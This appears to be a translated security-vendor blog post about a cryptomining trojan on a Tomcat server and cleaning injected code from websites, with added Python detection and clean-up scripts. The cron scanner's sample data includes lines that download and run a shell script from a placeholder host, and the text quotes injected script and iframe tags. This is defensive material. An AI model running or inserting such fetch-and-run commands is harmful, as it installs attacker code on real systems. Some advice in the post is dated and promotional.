Server crippled by a mining program
A new customer recently consulted Sine Security, saying that his server often lagged, the website failed to open, and remote connections to the server were extremely slow; sometimes the ping value reached 300-500 and the connection frequently dropped. After hearing the customer's description,
one would normally judge that he was under a CC + DDoS mixed-traffic attack. Strangely, though, the computer room saw no traffic attack at all. It was not a traffic attack, yet it still caused the server to lag and the website to fail to open. What kind of attack was this? To solve the problem of
the client's lagging server, we immediately arranged for a security engineer to carry out security detection and deployment on his Linux server.
The mining Trojan is also designed so that, if the customer forcibly stops the mining process, it automatically restarts and continues mining, achieving uninterrupted mining.
Careful inspection shows how: an hourly scheduled task remotely downloads the shell mining Trojan and executes it; the script checks whether the mining process is currently running and, if not, starts the Trojan to mine again.
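An added detection routine (not from the original post) for the hourly download-and-run scheduled task described above: it scans crontab-format text for the dropper pattern. The sample crontab, its paths and the host name are constructed placeholders.

```python
import re

# Constructed sample crontab modelled on the persistence described above;
# the host name and paths are placeholders, not real indicators.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
0 * * * * curl -fsSL http://dropper.example/x.sh | sh
*/10 * * * * wget -q -O /tmp/.s http://dropper.example/x.sh && sh /tmp/.s
30 3 * * 0 /usr/local/bin/backup.sh
"""

# A download tool piped straight into a shell, a download followed by a
# shell run, or a script executed from a temp directory is the usual shape
# of a cron-based dropper.  Only the command field (after the five schedule
# fields) is inspected; @hourly-style shorthand lines are not handled.
_SCHEDULE = re.compile(r"^\s*(\S+\s+){5}(?P<cmd>.+)$")
_PATTERNS = [
    ("download piped to shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("download then execute",   re.compile(r"\b(curl|wget)\b.*(&&|;)\s*(ba)?sh\b")),
    ("executes from temp dir",  re.compile(r"\b(ba)?sh\s+(/tmp/|/dev/shm/|/var/tmp/)")),
]

def suspicious_cron_entries(crontab_text):
    """Return (line_no, reason, command) for each cron line matching a
    download-and-execute pattern; comments and blank lines are skipped."""
    findings = []
    for n, line in enumerate(crontab_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = _SCHEDULE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        for reason, pat in _PATTERNS:
            if pat.search(cmd):
                findings.append((n, reason, cmd))
                break
    return findings

if __name__ == "__main__":
    for n, reason, cmd in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {n}: {reason}: {cmd}")
```

On a real host, feed it the output of crontab -l for each user plus the files under /etc/cron.d and /etc/crontab.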
A detailed security inspection was carried out on the client's Linux server. Fortunately, no server data had been encrypted; the server had been infected with a worm-type
virus. Had the data been encrypted, the loss would have been great, as the client ran a platform whose data was very important. After the mining Trojan was found,
the customer still needed to know how the server was attacked and how the Trojan was uploaded, so that the attack can be prevented
in the later stage.
Through our security engineers' security detection and analysis, we found that the server runs an Apache Tomcat environment, the platform is built on JSP + Oracle database, and the Apache Tomcat in use dates from a 2016 version, which carries a serious remote command execution vulnerability. Through this vulnerability an intruder can directly break into the server and obtain administrator permission on it.
A Sine Security engineer immediately repaired the Apache vulnerability and cleared the Trojan. The problem has since been solved: the client's server
runs stably and the website opens normally.
1. Check when the Trojan was installed, who connected to the server, and the logs.
2. Back up the host data, then reinstall the system.
3. Do not use an old version of the system; when reinstalling, a 2012 or 2016 version is recommended.
4. Delete all accounts except the administrator, then install 360 Security Guard to apply patches.
5. Install server security software.
Website hanging horse (the Chinese term for injecting malicious code into a site's pages) is the most troublesome problem for every website. The solutions are as follows: 1. It is easy to find the injected code in the program and delete it directly, or overwrite the files with your original source program, but the pages keep getting re-injected again and again, so this does not really solve the problem and is not the best solution. The best way is to find a professional security worker to help you solve it.
I've heard friends say that sinesafe is good; you can go and have a look.
Clear the horse + fix the vulnerabilities = completely solved
The so-called hanging horse is when hackers obtain the webmaster account through various means, including SQL injection, scanning for sensitive website files, server vulnerabilities, website program 0-days and so on, then log in to the website back end and obtain a webshell through database backup/restore or an upload vulnerability. With the webshell they modify the content of web pages and add malicious code to them. They can also get the server or website FTP directly through a weak password and then modify the website pages directly. When you visit a page that has had malicious code added, you are automatically redirected to the attacker's address or made to download the Trojan virus.
Clear the horse
1. Find the hanging horse tag, such as <script language="javascript" src="malicious script address"></script> or <iframe width=420 height=330 frameBorder=0 scrolling=auto src="malicious address"></iframe>; you can also use 360 or anti-virus software to block the malicious website. If the SQL database has been injected, it is generally JS that was injected.
2. After the malicious code is found, the next step is to clear the horse. If web pages were injected, you can clear them manually or in batches; web page cleaning is relatively simple, so I won't go into detail here. I will focus on SQL database cleaning, using the statement update table_name set field_name = replace(field_name, 'aaa', ''). What this statement means: replace every occurrence of the content 'aaa' in field_name with empty, so that you can delete the injected code one by one.
If you have no backup of your website program or database, you can carry out the above two steps to clear the horse. If your website program has a backup, you can directly overwrite the original files.
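The database clean-up above, as an added example that is not the author's own code: it first lists the distinct injected <script>/<iframe> tags found in a column, then applies the page's UPDATE ... REPLACE statement once per tag. It uses an in-memory SQLite table instead of the site's real database, and the rows, table and column names and host names are constructed.

```python
import re
import sqlite3

# Constructed sample rows carrying the two injected tag shapes shown above
# (host names are placeholders, not real indicators).
SAMPLE_ROWS = [
    (1, "<h1>Welcome</h1><p>Normal content.</p>"),
    (2, '<p>News</p><script language="javascript" src="http://bad.example/m.js"></script>'),
    (3, '<p>About</p><iframe width=420 height=330 frameborder=0 scrolling=auto src=http://bad.example/m.htm></iframe>'),
    (4, '<p>Contact</p><script language="javascript" src="http://bad.example/m.js"></script>'),
]

# The <script src=...></script> and <iframe ...></iframe> forms from the text.
INJECTED_TAG = re.compile(r"<script[^>]*\bsrc=[^>]*></script>|<iframe[^>]*></iframe>", re.I)
_IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")

def _ident(name):
    # Table/column names cannot be bound parameters; restrict them to plain
    # identifiers so the clean-up tool is not itself SQL-injectable.
    if not _IDENT.match(name):
        raise ValueError(f"unsafe identifier: {name!r}")
    return f'"{name}"'

def load_sample():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", SAMPLE_ROWS)
    return conn

def find_injected_tags(conn, table, column):
    """Distinct injected tags present in the column, in first-seen order."""
    seen = []
    for (body,) in conn.execute(f"SELECT {_ident(column)} FROM {_ident(table)}"):
        for tag in INJECTED_TAG.findall(body or ""):
            if tag not in seen:
                seen.append(tag)
    return seen

def strip_injected_tags(conn, table, column):
    """Apply UPDATE ... SET col = REPLACE(col, tag, '') per distinct tag;
    returns the total number of rows cleaned."""
    col, tbl, changed = _ident(column), _ident(table), 0
    with conn:
        for tag in find_injected_tags(conn, table, column):
            cur = conn.execute(
                f"UPDATE {tbl} SET {col} = REPLACE({col}, ?, '') WHERE instr({col}, ?) > 0",
                (tag, tag))
            changed += cur.rowcount
    return changed
```

Review the list returned by find_injected_tags before stripping, since a legitimate iframe on the site would match too.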
Fix the vulnerabilities (fixing the website's vulnerabilities is what website security means.)
1. Change the user name and password of the website back end and the default path of the back end.
2. Change the database name. If it is an Access database, it is best to change the file name extension to ASP instead of MDB; the file name can also contain several special symbols.
3. Then check whether the website has injection or cross-site vulnerabilities; if so, apply the anti-injection or anti-cross-site patches.
4. Check the website's upload functions; if there are common upload-bypass vulnerabilities, filter the corresponding code.
5. Try not to expose the website's back-end address, so it cannot be guessed through social engineering.
6. Write some anti-horse code to make injected frame code ineffective.
7. Disabling FSO (FileSystemObject) permission is also an absolute method.
8. Modify the read/write permissions of some website folders.
9. If it is your own server, you must not only secure your website program but also secure the server itself.
It is a common phenomenon for websites to be hung with horses, but it is also a serious problem for every website operator.
Have you ever wanted to give up because of daily intrusions into your websites and servers? Have you delayed the operation of your website because you don't know much about website technology? Do you feel impatient because a well-run website is repeatedly invaded by bored hackers? If conditions allow, we suggest finding a professional website security firm such as Sine Security to do security maintenance.